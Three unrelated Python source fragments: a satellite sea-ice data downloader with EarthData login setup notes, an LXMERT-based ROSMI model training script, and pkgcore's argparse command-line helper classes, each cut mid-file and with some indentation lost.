    sat_start_dates = [(1978,11,1),(1987,7,9),(1991,12,3),(1995,10,1),(2008,1,1)]
    sat_end_dates = [(1987,7,8),(1991,12,2),(1995,9,30),(2007,12,31),(2017,12,31)]
    all_dates = tt.dates_in_range(start_date, end_date)
    starting_dir = os.getcwd()
    # Bug fix: the original used `is not`, which tests string identity
    # rather than equality.
    if starting_dir != save_to:
        os.chdir(save_to)
    try:
        dir_contents = os.listdir()
        for index, d in enumerate(all_dates):
            # (Removed leftover debug `print(d) ### FOR TESTING`.)
            if not tt.is_time_in_range(sat_start_dates[0],sat_end_dates[-1],d):
                raise ValueError('Given date range exceeds hard-coded satellite date ranges.')
            # Pick the satellite whose operational window covers this date.
            for sat in range(0,len(sat_abbrevs)):
                if tt.is_time_in_range(sat_start_dates[sat], sat_end_dates[sat], d):
                    sat_abbrev = sat_abbrevs[sat]
            filename = filename_part1 + sat_abbrev + '_' + '{0[0]}{0[1]:02d}{0[2]:02d}'.format(d) + filename_part2
            if filename not in dir_contents or overwrite:
                df.single_file(url_root + '{0[0]}/'.format(d), filename, save_to, ftp_root=ftp_root,
                               overwrite=False, auth=None)
            df.how_far(index, all_dates, 0.1)
    finally:
        # Restore the working directory even if a download raises (the
        # original left the process chdir'ed into save_to on error).
        os.chdir(starting_dir)
def nimbus5(start_date, end_date, save_to, convert=False, conversion_script_dir=None):
    """ Downloads Nimbus-5 sea ice concentration product.
    Unzips files first. Converts data from HDF4 to HDF5 format by calling df.convert_to_hdf5()
    if 'convert' is True, then deletes original HDF4 file.
    NSIDC's v1 Nimbus-5 daily ESMR product on 25 km grid in compressed HDF4 format. Product based on
    a single channel (19 GHz), which is less accurate than SMMR and SSM/I products from after 1976.
    Information: http://nsidc.org/data/NSIDC-0009
    IMPORTANT NOTE: Downloading batch data via HTTPS requires login to EarthData. To do this, one must create an
    account (https://urs.earthdata.nasa.gov/users/new) and then create a .netrc file:
        cd $HOME
        rm -f .netrc
        touch .netrc
        echo 'machine urs.earthdata.nasa.gov login [USERNAME] password [PASSWORD]' >> .netrc
        chmod 0600 .netrc
    Example file path: https://daacdata.apps.nsidc.org/pub/DATASETS/nsidc0009_esmr_seaice/south/daily00/ESMR-1972346.tse.00.gz
    Required data acknowledgement given in full here: http://dx.doi.org/10.5067/W2PKTWMTY0TP.
    """
    url_dir = 'https://daacdata.apps.nsidc.org/pub/DATASETS/nsidc0009_esmr_seaice/south/daily00/'
    filename_part1 = 'ESMR-'
    filename_part2 = '.tse.00.gz'
    filename_part2_uncompressed = '.tse.00.hdf'
    filename_part2_uncompressed_converted = '.tse.00.h5'
    all_dates = tt.dates_in_range(start_date, end_date)
    for index, d in enumerate(all_dates):
        date_365 = tt.convert_date_to_365(d)
        filename = filename_part1 + '{0[0]}{1:03d}'.format(d,date_365) + filename_part2
        intermediate_filename = filename_part1 + '{0[0]}{1:03d}'.format(d, date_365) + filename_part2_uncompressed
        new_filename = filename_part1 + '{0[0]}{1:03d}'.format(d,date_365) + filename_part2_uncompressed_converted
        starting_dir = os.getcwd()
        try:
            # Bug fix: the original tested `starting_dir is not dir`, comparing
            # against the *builtin* `dir` function (always True). The intent,
            # matching dmsp_nrt/dmsp_v3, is to skip chdir when already in save_to.
            if starting_dir != save_to:
                os.chdir(save_to)
            if new_filename not in os.listdir():
                df.single_file(url_dir, filename, save_to, overwrite=False, auth=None)
                df.un_gzip(save_to, filename, append_extension='.hdf', remove_compressed_file=True)
                # Bug fix: conversion previously ran unconditionally, ignoring
                # the 'convert' flag the docstring describes.
                if convert:
                    df.convert_to_hdf5(conversion_script_dir, intermediate_filename, save_to, save_to, overwrite=False, delete_original=True)
        finally:
            os.chdir(starting_dir)
        df.how_far(index, all_dates, 0.1)
def ecmwf(date_range='1979-01-01/to/2017-08-31',area='-40/-90/-90/90',type='an',step='0',time='00/06/12/18',
params=['msl','t2m','skt'],output_filename=None):
""" Submits MARS request to retrieve ERA-Interim reanalysis fields as netCDF file.
Arguments:
date_range: for daily fields, format as, e.g., '1979-01-01/to/2017-08-31'
for monthly means of daily means, use [datetime(start_yr,start_mo,1),datetime(end_yr,end_mo,1)]
area: subsetting area, format '-40/-90/-90/90' (N/W/S/E)
type: 'an' for analysis or 'fc' for forecast
step: '0' for analysis only, '6/12' or '3/6/9/12' for 6-hourly or 3-hourly forecasts from 0000 and 1200 UTC
or None for monthly means (regardless, it will be | |
<reponame>marioskatsak/lxmert<filename>src/tasks/rosmi_backup.py
# coding=utf-8
# Copyleft 2019 project LXRT.
import os, time
import collections
import torch, json
import torch.nn as nn
import numpy as np
import difflib
from torch.autograd import Variable
from torch.utils.data.dataloader import DataLoader
from tqdm import tqdm
# from datasketch import MinHash, MinHashLSHForest, MinHashLSH
from elasticsearch import Elasticsearch
from param import args
from pretrain.qa_answer_table import load_lxmert_qa
from tasks.rosmi_model import ROSMIModel
from tasks.rosmi_data import ROSMIDataset, ROSMITorchDataset, ROSMIEvaluator,RENCIDataset, RENCITorchDataset, RENCIEvaluator
from torch.utils.tensorboard import SummaryWriter
from utils import iou_loss, giou_loss, elastic_prediction
from torch.optim.lr_scheduler import ReduceLROnPlateau
from lxrt.entry import convert_sents_to_features
from lxrt.tokenization import BertTokenizer
import spacy
nlp = spacy.load("en_core_web_md")
# Lightweight bundle of a dataset, its batched loader and its evaluator.
DataTuple = collections.namedtuple("DataTuple", 'dataset loader evaluator')
# Maximum tokenised sentence length. NOTE(review): not referenced in the
# visible portion of this file — confirm it is used by the trainer below.
MAX_SENT_LENGTH = 25
def get_data_tuple(splits: str, bs:int, shuffle=False, drop_last=False) -> DataTuple:
    """Build the ROSMI dataset, its evaluator and a batched loader for `splits`."""
    dataset = ROSMIDataset(splits)
    torch_dataset = ROSMITorchDataset(dataset)
    scorer = ROSMIEvaluator(dataset)
    loader = DataLoader(
        torch_dataset,
        batch_size=bs,
        shuffle=shuffle,
        num_workers=args.num_workers,
        drop_last=drop_last,
        pin_memory=True,
    )
    return DataTuple(dataset=dataset, loader=loader, evaluator=scorer)
def get_renci_data_tuple(splits: str, bs:int, shuffle=False, drop_last=False) -> DataTuple:
    """Build the RENCI dataset, its evaluator and a batched loader for `splits`."""
    dataset = RENCIDataset(splits)
    torch_dataset = RENCITorchDataset(dataset)
    scorer = RENCIEvaluator(dataset)
    loader = DataLoader(
        torch_dataset,
        batch_size=bs,
        shuffle=shuffle,
        num_workers=args.num_workers,
        drop_last=drop_last,
        pin_memory=True,
    )
    return DataTuple(dataset=dataset, loader=loader, evaluator=scorer)
class ROSMI:
    def __init__(self,get_data_tuple):
        """Build the train/valid/test data tuples, the ROSMI model, the loss
        functions, the optimizer and a TensorBoard writer.

        Args:
            get_data_tuple: factory returning a DataTuple for a split name
                (the ROSMI or RENCI variant defined above).
        """
        # Datasets
        self.train_tuple = get_data_tuple(
            args.train, bs=args.batch_size, shuffle=True, drop_last=True
        )
        if args.valid != "":
            self.valid_tuple = get_data_tuple(
                args.valid, bs=args.batch_size,
                shuffle=False, drop_last=False
            )
        else:
            self.valid_tuple = None
        if args.test:
            self.test_tuple = get_data_tuple(
                args.test, bs=args.batch_size,
                shuffle=False, drop_last=False
            )
        else:
            self.test_tuple = None
        # One TensorBoard run directory per host and timestamp.
        self.writer = SummaryWriter(f'snap/rosmi/logging_rosmi_{args.n_ent}_names/{os.uname()[1]}.{time.time()}')
        # Model
        self.model = ROSMIModel(self.train_tuple.dataset.num_bearings)
        # Load pre-trained weights
        if args.load_lxmert is not None:
            self.model.lxrt_encoder.load(args.load_lxmert)
        if args.load_lxmert_qa is not None:
            load_lxmert_qa(args.load_lxmert_qa, self.model,
                           label2ans=self.train_tuple.dataset.label2ans)
        # GPU options
        self.model = self.model.cuda()
        if args.multiGPU:
            self.model.lxrt_encoder.multi_gpu()
        # Loss and Optimizer
        self.bce_loss = nn.BCEWithLogitsLoss()
        self.cross_loss = nn.CrossEntropyLoss()
        self.mse_loss = nn.SmoothL1Loss()
        if 'bert' in args.optim:
            # input("bert")
            # BertAdam needs the total number of optimisation steps up front
            # for its linear warmup schedule.
            batch_per_epoch = len(self.train_tuple.loader)
            t_total = int(batch_per_epoch * args.epochs)
            # t_total = -1
            # batch 24 when 20 and epochs 3000 = 72000
            # input(int(batch_per_epoch * args.epochs))
            # t_total = 72000
            print("BertAdam Total Iters: %d" % t_total)
            from lxrt.optimization import BertAdam
            self.optim = BertAdam(list(self.model.parameters()),
                                  lr=args.lr,
                                  warmup=0.1,
                                  t_total=t_total)
        else:
            self.optim = args.optimizer(self.model.parameters(), args.lr)
            # input("AdamW")
            # self.optim = torch.optim.AdamW(self.model.parameters(), args.lr, weight_decay=0.1,amsgrad=True)
        # self.scheduler = ReduceLROnPlateau(self.optim, 'min')
        # Output Directory
        self.output = args.output
        os.makedirs(self.output, exist_ok=True)
    def train(self, train_tuple, eval_tuple):
        """Train the model, evaluating on validation (and optionally test) each epoch.

        Args:
            train_tuple: DataTuple(dataset, loader, evaluator) for training.
            eval_tuple: DataTuple used for per-epoch validation.

        Returns:
            (best_acc3, best_mDist, best_testDist): best validation accuracy
            seen, plus the best validation and test distance statistics.
        """
        dset, loader, evaluator = train_tuple
        # Wrap the loader with tqdm only when progress bars were requested.
        iter_wrapper = (lambda x: tqdm(x, total=len(loader))) if args.tqdm else (lambda x: x)
        best_valid = 0.
        best_train = 0.
        best_acc2 = 0.
        best_tacc = 0
        best_acc3 = 0
        best_test_acc = 0
        # Distance stats: lower is better, so start from a large sentinel.
        best_mDist = [99999,99999,99999,99999]
        best_testDist = [99999,99999,99999,99999]
        n_iter = 0
        for epoch in tqdm(range(args.epochs)):
            sentid2ans = {}
            for i, (sent_id, feats, feat_mask, boxes, names, sent, dists, diste, land_, cland_, bear_ ,l_start,l_end, target) in iter_wrapper(enumerate(loader)):
                total_loss = 0
                self.model.train()
                self.optim.zero_grad()
                # Name features: packing depends on the configured mode.
                if args.n_ent:
                    names = (names[0].squeeze(2).cuda(), \
                            names[1].squeeze(2).cuda(), \
                            names[2].squeeze(2).cuda())
                elif args.qa:
                    names = (names[0].cuda(), \
                            names[1].cuda(), \
                            names[2].cuda())
                else:
                    names = None
                feats, feat_mask, boxes, target, dists, diste, land_, cland_, bear_, l_start, l_end = feats.cuda(), feat_mask.cuda(), boxes.cuda(), target.cuda(), dists.cuda(), diste.cuda(), \
                    land_.cuda(), cland_.cuda(), bear_.cuda(), l_start.cuda(), l_end.cuda()
                logit, auxilaries = self.model(feats.float(), feat_mask.float(), boxes.float(), names, sent)
                # Auxiliary heads: distance start/end, landmark regression,
                # landmark classification, bearing, and landmark span start/end.
                p_dist_s, p_dist_e, p_land, p_cland, p_bear, p_start, p_end = auxilaries
                assert logit.dim() == target.dim() == 2
                # Each auxiliary BCE loss is scaled by its head's output width.
                bear_loss = self.bce_loss(p_bear,bear_.float())
                self.writer.add_scalar('Bearing loss', bear_loss, n_iter)
                total_loss += bear_loss* p_bear.size(1) * 2
                dists_loss = self.bce_loss(p_dist_s,dists.float())
                self.writer.add_scalar('distance Start loss', dists_loss, n_iter)
                total_loss += dists_loss* p_dist_s.size(1) * 2
                diste_loss = self.bce_loss(p_dist_e,diste.float())
                self.writer.add_scalar('distance End loss', diste_loss, n_iter)
                total_loss += diste_loss* p_dist_e.size(1) * 2
                p_start_loss = self.bce_loss(p_start,l_start.float())
                total_loss += p_start_loss* p_start.size(1) * 2
                p_end_loss = self.bce_loss(p_end,l_end.float())
                total_loss += p_end_loss* p_end.size(1) * 2
                if args.qa:
                    # QA mode: span losses stand in for landmark classification.
                    cland_loss = self.bce_loss(p_start,l_start) + self.bce_loss(p_end,l_end)
                    total_loss += cland_loss* p_start.size(1) * 2
                else:
                    cland_loss = self.bce_loss(p_cland,cland_)
                    self.writer.add_scalar('Cls Landmark loss', cland_loss, n_iter)
                    total_loss += cland_loss* p_cland.size(1) * 4
                self.writer.add_scalar('total loss', total_loss, n_iter)
                total_loss.backward()
                nn.utils.clip_grad_norm_(self.model.parameters(), 5.)
                self.optim.step()
                label = logit
                # Argmax each auxiliary head over its class dimension.
                bear_score, bear_label = p_bear.max(1)
                _, p_start = p_start.max(1)
                _, p_end = p_end.max(1)
                _, p_cland = p_cland.max(1)
                _, dist_e = p_dist_e.max(1)
                _, dist_s = p_dist_s.max(1)
                # Collect per-sentence predictions for the epoch-level evaluator.
                for sid,diss,dise,ln,ln_,br,l_s,l_e, l in zip(sent_id, dist_s.cpu().detach().numpy(), \
                                            dist_e.cpu().detach().numpy(), \
                                            p_land.cpu().detach().numpy(), \
                                            p_cland.cpu().detach().numpy(), \
                                            bear_label.cpu().detach().numpy(), \
                                            p_start.cpu().detach().numpy(), \
                                            p_end.cpu().detach().numpy(), \
                                            label.cpu().detach().numpy()):
                    # map bearing class index back to its label string
                    br = dset.label2bearing[br]
                    sentid2ans[sid.item()] = (l, diss,dise, ln,ln_, br,l_s,l_e)
                n_iter += 1
            log_str = f"\nEpoch {epoch}: Total Loss {total_loss}\n"
            tmp_acc, mDist, acc2, acc3, tmpAcc = evaluator.evaluate(sentid2ans)
            log_str += f"\nEpoch {epoch}: Train {tmpAcc * 100.}%\n"
            self.writer.add_scalar('Accuracy/train [IoU=0.5]', tmpAcc * 100., n_iter)
            if self.valid_tuple is not None:  # Do Validation
                valid_score, m_dist, acc2, acc3, tAcc = self.evaluate(eval_tuple)
                if valid_score > best_valid:
                    best_valid = valid_score
                if tmpAcc > best_train:
                    best_train = tmpAcc
                if acc2 > best_acc2:
                    best_acc2 = acc2
                if acc3 > best_acc3:
                    best_acc3 = acc3
                    # Checkpoint only when acc3 (the primary metric) improves.
                    self.save(f"BEST_{args.abla}")
                if tAcc > best_tacc:
                    best_tacc = tAcc
                if m_dist[0] < best_mDist[0]:
                    best_mDist = m_dist
                self.writer.add_scalar('Accuracy/valid [IoU=0.5]', valid_score * 100., n_iter)
                log_str += f"Epoch {epoch}: Best Valid dist/pixel [SD] {best_mDist[0]} [{best_mDist[1]}] / {best_mDist[2]} [{best_mDist[1]}] \n" + \
                           f"Epoch {epoch}: Best Train {best_train * 100.}%\n" + \
                           f"Epoch {epoch}: Best Val3 {best_acc3 * 100.}%\n" + \
                           f"Epoch {epoch}: T-Best Val {best_tacc * 100.}%\n"
            if self.test_tuple is not None:  # Do testing
                _, test_dist, _, _, test_acc = self.evaluate(self.test_tuple)
                print("test")
                if test_acc > best_test_acc:
                    best_test_acc = test_acc
                if test_dist[0] < best_testDist[0]:
                    best_testDist = test_dist
                log_str += f"Epoch {epoch}: Test {test_acc * 100.}%\n" + \
                           f"Epoch {epoch}: Best Test dist/pixel [SD] {best_testDist[0]} [{best_testDist[1]}] / {best_testDist[2]} [{best_testDist[1]}]\n" + \
                           f"Epoch {epoch}: Best Test {best_test_acc * 100.}%\n"
            print(log_str, end='')
            with open(self.output + "/log.log", 'a') as f:
                f.write(log_str)
                f.flush()
        self.save(f"LAST_{args.abla}")
        return best_acc3, best_mDist, best_testDist
    def predict(self, eval_tuple: DataTuple, dump=None):
        """
        Predict the answers to questions in a data split.

        :param eval_tuple: The data tuple to be evaluated.
        :param dump: The path of saved file to dump results.
            NOTE(review): not used anywhere in this body -- confirm intent.
        :return: dict mapping sentence id to a tuple of
            (logit, dist_start, dist_end, landmark, cls_landmark, bearing,
            span_start, span_end) predictions.
        """
        self.model.eval()
        dset, loader, evaluator = eval_tuple
        sentid2ans = {}
        for i, datum_tuple in enumerate(loader):
            # Only consume the first 11 fields: Avoid seeing ground truth.
            ques_id, feats, feat_mask, boxes, names, sent, g_ds, g_de, land_,cland_, bear_ = datum_tuple[:11]
            with torch.no_grad():
                # Name features: packing depends on the configured mode.
                if args.n_ent:
                    names = (names[0].squeeze(2).cuda(), \
                            names[1].squeeze(2).cuda(), \
                            names[2].squeeze(2).cuda())
                elif args.qa:
                    names = (names[0].cuda(), \
                            names[1].cuda(), \
                            names[2].cuda())
                else:
                    names = None
                feats, feat_mask, boxes = feats.cuda(),feat_mask.cuda(), boxes.cuda()
                label, aux = self.model(feats.float(), feat_mask.float(), boxes.float(), names, sent)
                dist_s, dist_e, lnd,clnd, brng, land_start, land_end = aux
                # Argmax each auxiliary head over its class dimension.
                bear_score, bear_label = brng.max(1)
                _, dist_e = dist_e.max(1)
                _, dist_s = dist_s.max(1)
                _, land_start = land_start.max(1)
                _, land_end = land_end.max(1)
                _, clnd = clnd.max(1)
                for qid,diss,dise, ln,cln, br,l_s,l_e, l in zip(ques_id,dist_s.cpu().detach().numpy(), \
                                            dist_e.cpu().detach().numpy(), \
                                            lnd.cpu().detach().numpy(), \
                                            clnd.cpu().detach().numpy(), \
                                            bear_label.cpu().detach().numpy(), \
                                            land_start.cpu().detach().numpy(), \
                                            land_end.cpu().detach().numpy(), \
                                            label.cpu().detach().numpy()):
                    # map bearing class index back to its label string
                    br = dset.label2bearing[br]
                    sentid2ans[qid.item()] = (l, diss, dise, ln,cln, br, l_s, l_e)
        return sentid2ans
def evaluate(self, eval_tuple: DataTuple, dump=None):
"""Evaluate all data in data_tuple."""
sentid2ans = self.predict(eval_tuple, dump)
return eval_tuple.evaluator.evaluate(sentid2ans)
@staticmethod
def oracle_score(data_tuple):
dset, loader, evaluator = data_tuple
sentid2ans = {}
for i, (ques_id, feats, feat_mask, boxes, names, sent,dists,diste,land_,cland_, bear_,land_s,land_e, target) in enumerate(loader):
# input(target)
label = target
for qid,diss,dise, ln,cln, br,l_s,l_e, l in | |
# Repository: thesamesam/pkgcore
"""Utilities for writing commandline utilities.
pkgcore scripts should use the :obj:`ArgumentParser` subclass here for a
consistent commandline "look and feel" (and it tries to make life a
bit easier too). They will probably want to use :obj:`main` from a C{if
__name__ == '__main__'} block too: it will take care of things like
consistent exception handling.
See dev-notes/commandline.rst for more complete documentation.
"""
import argparse
import os
import sys
from functools import partial
from importlib import import_module
from snakeoil import modules
from snakeoil.cli import arghparse, tool
from snakeoil.log import suppress_logging
from snakeoil.osutils import abspath, normpath, pjoin
from snakeoil.sequences import iflatten_instance, unstable_unique
from snakeoil.strings import pluralism
from .. import const
from ..config import load_config
from ..plugin import get_plugins
from ..repository import errors as repo_errors
from ..restrictions import packages, restriction
from . import parserestrict
class StoreTarget(argparse._AppendAction):
    """Parse extended package atom syntax and optionally set arguments.

    Various target arguments are supported including the following:

    atom
        An extended atom syntax is supported, see the related section
        in pkgcore(5).

    package set
        Used to define lists of packages, the syntax used for these is
        @pkgset. For example, the @system and @world package sets are
        supported.

    extended globbing
        Globbing package names or atoms allows for use cases such as
        ``'far*'`` (merge every package starting with 'far'),
        ``'dev-python/*::gentoo'`` (merge every package in the dev-python
        category from the gentoo repo), or even '*' (merge everything).

    Also, the target '-' allows targets to be read from standard input.
    """

    def __init__(self, *args, **kwargs):
        # Behavior toggles are passed in as extra keywords by parser setup.
        self.use_sets = kwargs.pop('use_sets', False)
        self.allow_ebuild_paths = kwargs.pop('allow_ebuild_paths', False)
        self.allow_external_repos = kwargs.pop('allow_external_repos', False)
        self.separator = kwargs.pop('separator', None)
        kwargs.setdefault('default', ())
        super().__init__(*args, **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):
        if self.separator is not None:
            # a single argument carrying separator-delimited targets
            values = values.split(self.separator)
        if self.use_sets:
            # NOTE(review): the empty list is stored under the attribute named
            # by self.use_sets, but set tokens below are appended to
            # namespace.sets -- confirm use_sets is always the string 'sets'.
            setattr(namespace, self.use_sets, [])
        if isinstance(values, str):
            values = [values]
        elif values is not None and len(values) == 1 and values[0] == '-':
            # the single target '-' reads targets from standard input
            if not sys.stdin.isatty():
                values = [x.strip() for x in sys.stdin.readlines() if x.strip() != '']
                # reassign stdin to allow interactivity (currently only works for unix)
                sys.stdin = open('/dev/tty')
            else:
                raise argparse.ArgumentError(self, "'-' is only valid when piping data in")
        # override default empty tuple value to appendable list
        if values:
            setattr(namespace, self.dest, [])
        for token in values:
            if self.use_sets and token.startswith('@'):
                # '@name' targets are package sets, stored without the '@'
                namespace.sets.append(token[1:])
            else:
                if self.allow_ebuild_paths and token.endswith('.ebuild'):
                    try:
                        repo = getattr(namespace, 'repo', namespace.domain.ebuild_repos_raw)
                    except AttributeError:
                        raise argparse.ArgumentTypeError(
                            'repo or domain must be defined in the namespace')
                    if not os.path.exists(token):
                        raise argparse.ArgumentError(self, f"nonexistent ebuild: {token!r}")
                    elif not os.path.isfile(token):
                        raise argparse.ArgumentError(self, f"invalid ebuild: {token!r}")
                    if self.allow_external_repos and token not in repo:
                        # ebuild lives outside the configured repos: register
                        # its repo (three directories up from the ebuild).
                        repo_root_dir = os.path.abspath(
                            pjoin(token, os.pardir, os.pardir, os.pardir))
                        try:
                            with suppress_logging():
                                repo = namespace.domain.add_repo(
                                    repo_root_dir, config=namespace.config)
                        except repo_errors.RepoError as e:
                            raise argparse.ArgumentError(self, f"{token!r} -- {e}")
                    try:
                        restriction = repo.path_restrict(token)
                    except ValueError as e:
                        raise argparse.ArgumentError(self, e)
                else:
                    try:
                        restriction = parserestrict.parse_match(token)
                    except parserestrict.ParseError as e:
                        parser.error(e)
                # append (token, restriction) via the base _AppendAction
                super().__call__(
                    parser, namespace,
                    (token, restriction), option_string=option_string)
# Sentinel requesting every configured object of the given config type.
CONFIG_ALL_DEFAULT = object()


class NoDefaultConfigError(argparse.ArgumentError):
    """Raised when the config defines no default object of the requested type."""
    pass
class StoreConfigObject(argparse._StoreAction):
    """argparse action that resolves its argument to an object from the config.

    The actual lookup is deferred (via :obj:`arghparse.DelayedParse`) so it
    only runs once the config has been attached to the namespace.
    """

    # priority used when scheduling the delayed config lookup
    default_priority = 20

    def __init__(self, *args, **kwargs):
        """
        :keyword priority: delayed-parse priority (defaults to
            :obj:`default_priority`).
        :keyword config_type: required string naming the config section to
            look objects up in.
        :keyword get_default: if true, default to the config's default object
            of ``config_type``.
        :keyword store_name: if true, store ``(name, obj)`` pairs instead of
            the bare object.
        :keyword writable: if true, frozen (readonly) config objects are
            rejected.
        :raises ValueError: if ``config_type`` is missing or not a string.
        """
        self.priority = int(kwargs.pop("priority", self.default_priority))
        self.config_type = kwargs.pop("config_type", None)
        if self.config_type is None or not isinstance(self.config_type, str):
            # message grammar fixed (was "config_type must specified, ...")
            raise ValueError("config_type must be specified, and be a string")
        if kwargs.pop("get_default", False):
            kwargs["default"] = arghparse.DelayedValue(
                partial(self.store_default, self.config_type,
                        option_string=kwargs.get('option_strings', [None])[0]),
                self.priority)
        self.store_name = kwargs.pop("store_name", False)
        self.writable = kwargs.pop("writable", None)
        self.target = argparse._StoreAction(*args, **kwargs)
        super().__init__(*args, **kwargs)

    @staticmethod
    def _choices(sections):
        """Yield available values for a given option."""
        for k, v in sections.items():
            yield k

    def _load_obj(self, sections, name):
        """Return the config object registered under *name* in *sections*.

        :raises argparse.ArgumentError: if *name* is unknown, or the object
            is frozen while ``writable`` was requested.
        """
        obj_type = self.metavar if self.metavar is not None else self.config_type
        obj_type = obj_type.lower() + ' ' if obj_type is not None else ''
        try:
            val = sections[name]
        except KeyError:
            choices = ', '.join(self._choices(sections))
            if choices:
                choices = f" (available: {choices})"
            raise argparse.ArgumentError(
                self, f"couldn't find {obj_type}{name!r}{choices}")
        if self.writable and getattr(val, 'frozen', False):
            raise argparse.ArgumentError(
                self, f"{obj_type}{name!r} is readonly")
        if self.store_name:
            return name, val
        return val

    def __call__(self, parser, namespace, values, option_string=None):
        # Defer the lookup until the config is available on the namespace.
        setattr(namespace, self.dest, arghparse.DelayedParse(
            partial(self._real_call, parser, namespace, values, option_string),
            self.priority))

    def _get_sections(self, config, namespace):
        """Return the mapping of named config objects for this action's type."""
        return getattr(config, self.config_type)

    def _real_call(self, parser, namespace, values, option_string=None):
        """Resolve *values* (a name, list of names, or sentinel) to objects."""
        config = getattr(namespace, 'config', None)
        if config is None:
            raise ValueError("no config found, internal bug")
        sections = self._get_sections(config, namespace)
        if self.nargs == argparse.ZERO_OR_MORE and values == []:
            # no explicit values given: operate on everything available
            values = list(sections.keys())
        if values is CONFIG_ALL_DEFAULT:
            value = [self._load_obj(sections, x) for x in sections]
        elif isinstance(values, str):
            value = self._load_obj(sections, values)
        else:
            value = [self._load_obj(sections, x) for x in values]
        setattr(namespace, self.dest, value)

    @staticmethod
    def store_default(config_type, namespace, attr, option_string=None):
        """Store the config's default object of *config_type* on *namespace*.

        :raises NoDefaultConfigError: if no default object of the requested
            type is configured.
        """
        config = getattr(namespace, 'config', None)
        if config is None:
            raise argparse.ArgumentTypeError(
                "no config found -- internal bug, or broken on disk configuration")
        obj = config.get_default(config_type)
        if obj is None:
            known_objs = sorted(getattr(config, config_type).keys())
            msg = f"config error: no default object of type {config_type!r} found. "
            if not option_string:
                msg += "Please fix your configuration."
            else:
                msg += (
                    "Please either fix your configuration, or set the "
                    f"{config_type} via the {option_string} option.")
            if known_objs:
                # leading space added: the preceding sentence ends with '.'
                msg += f" Known {config_type}s: {', '.join(map(repr, known_objs))}"
            raise NoDefaultConfigError(None, msg)
        setattr(namespace, attr, obj)

    @staticmethod
    def store_all_default(config_type, namespace, attr):
        """Store every ``(name, obj)`` pair of *config_type* on *namespace*."""
        config = getattr(namespace, 'config', None)
        if config is None:
            raise ValueError("no config found -- internal bug")
        obj = [(k, v) for k, v in getattr(config, config_type).items()]
        setattr(namespace, attr, obj)

    @classmethod
    def lazy_load_object(cls, config_type, key, priority=None):
        """Return a DelayedValue that loads ``config[config_type][key]``."""
        if priority is None:
            priority = cls.default_priority
        return arghparse.DelayedValue(
            partial(cls._lazy_load_object, config_type, key),
            priority)

    @staticmethod
    def _lazy_load_object(config_type, key, namespace, attr):
        try:
            obj = getattr(namespace.config, config_type)[key]
        except KeyError:
            raise argparse.ArgumentError(
                None, f"couldn't find {config_type} {attr!r}")
        setattr(namespace, attr, obj)
class StoreRepoObject(StoreConfigObject):
    """Load a repo object from the config."""

    # mapping between supported repo type requests and the related attr on
    # domain objects to pull the requested repos from
    valid_repo_types = {
        'config': 'repo_configs',
        'all': 'repos',
        'all-raw': 'repos_raw',
        'source': 'source_repos',
        'source-raw': 'source_repos_raw',
        'installed': 'installed_repos',
        'installed-raw': 'installed_repos_raw',
        'unfiltered': 'unfiltered_repos',
        'ebuild': 'ebuild_repos',
        'ebuild-unfiltered': 'ebuild_repos_unfiltered',
        'ebuild-raw': 'ebuild_repos_raw',
        'binary': 'binary_repos',
        'binary-unfiltered': 'binary_repos_unfiltered',
        'binary-raw': 'binary_repos_raw',
    }

    def __init__(self, *args, **kwargs):
        """
        :keyword repo_type: one of :obj:`valid_repo_types` (default ``'all'``).
        :keyword allow_aliases: iterable of repo-type names accepted as targets.
        :keyword allow_name_lookup: resolve names via the config (default True).
        :keyword allow_external_repos: allow filesystem paths to unconfigured repos.
        """
        if 'config_type' in kwargs:
            # config_type is derived from repo_type below, never user supplied
            raise ValueError(
                "StoreRepoObject: config_type keyword is redundant: got %s"
                % (kwargs['config_type'],))
        self.repo_type = kwargs.pop('repo_type', 'all')
        if self.repo_type not in self.valid_repo_types:
            raise argparse.ArgumentTypeError(f"unknown repo type: {self.repo_type!r}")
        self.repo_key = self.valid_repo_types[self.repo_type]
        self.allow_aliases = set(kwargs.pop("allow_aliases", ()))
        if self.allow_aliases:
            unknown_aliases = self.allow_aliases.difference(self.valid_repo_types)
            if unknown_aliases:
                raise argparse.ArgumentTypeError(
                    'unknown repo alias%s: %s' % (
                        pluralism(unknown_aliases, plural='es'), ', '.join(unknown_aliases)))
        if self.repo_type == 'config':
            kwargs['config_type'] = 'repo_config'
        else:
            kwargs['config_type'] = 'repo'
        self.allow_name_lookup = kwargs.pop("allow_name_lookup", True)
        self.allow_external_repos = kwargs.pop("allow_external_repos", False)
        super().__init__(*args, **kwargs)

    def _get_sections(self, config, namespace):
        """Return the repo mapping that ``repo_type`` points at."""
        domain = getattr(namespace, 'domain', None)
        # return repo config objects
        if domain is None or self.repo_type == 'config':
            return StoreConfigObject._get_sections(self, config, namespace)
        self.config = config
        self.domain = config.get_default("domain")
        # return the type of repos requested
        return getattr(self.domain, self.repo_key)

    @staticmethod
    def _choices(sections):
        """Return an iterable of name: location mappings for available repos.

        If a repo doesn't have a proper location just the name is returned.
        """
        for repo_name, repo in sorted(unstable_unique(sections.items())):
            repo_name = getattr(repo, 'repo_id', repo_name)
            if hasattr(repo, 'location'):
                yield f"{repo_name}:{repo.location}"
            else:
                yield repo_name

    def _load_obj(self, sections, name):
        """Resolve *name* to a repo: direct match, alias, or external path."""
        repo = name
        if not self.allow_name_lookup or repo in sections:
            # requested repo exists in the config
            pass
        elif name in self.allow_aliases and self.valid_repo_types[name]:
            # pull repos related to given alias
            # NOTE(review): the second condition is a non-empty attr name and
            # is therefore always truthy; membership alone decides this branch.
            return getattr(self.domain, self.valid_repo_types[name])
        else:
            # name wasn't found, check repo aliases for it
            for repo_name, repo_obj in sections.items():
                if repo in repo_obj.aliases:
                    repo = repo_name
                    break
            else:
                # try to add it as an external repo
                if self.allow_external_repos and os.path.exists(repo):
                    try:
                        configure = not self.repo_type.endswith('-raw')
                        with suppress_logging():
                            repo_obj = self.domain.add_repo(
                                repo, config=self.config, configure=configure)
                        repo = repo_obj.location
                    except repo_errors.RepoError as e:
                        raise argparse.ArgumentError(self, e)
                    if hasattr(self.domain, '_' + self.repo_key):
                        # force JIT-ed attr refresh to include newly added repo
                        setattr(self.domain, '_' + self.repo_key, None)
                    sections = getattr(self.domain, self.repo_key)
        return StoreConfigObject._load_obj(self, sections, repo)
class DomainFromPath(StoreConfigObject):
    """Load the domain whose root matches a requested filesystem path."""

    def __init__(self, *args, **kwargs):
        # This action only ever resolves domains; force the config type.
        kwargs['config_type'] = 'domain'
        super().__init__(*args, **kwargs)

    def _load_obj(self, sections, requested_path):
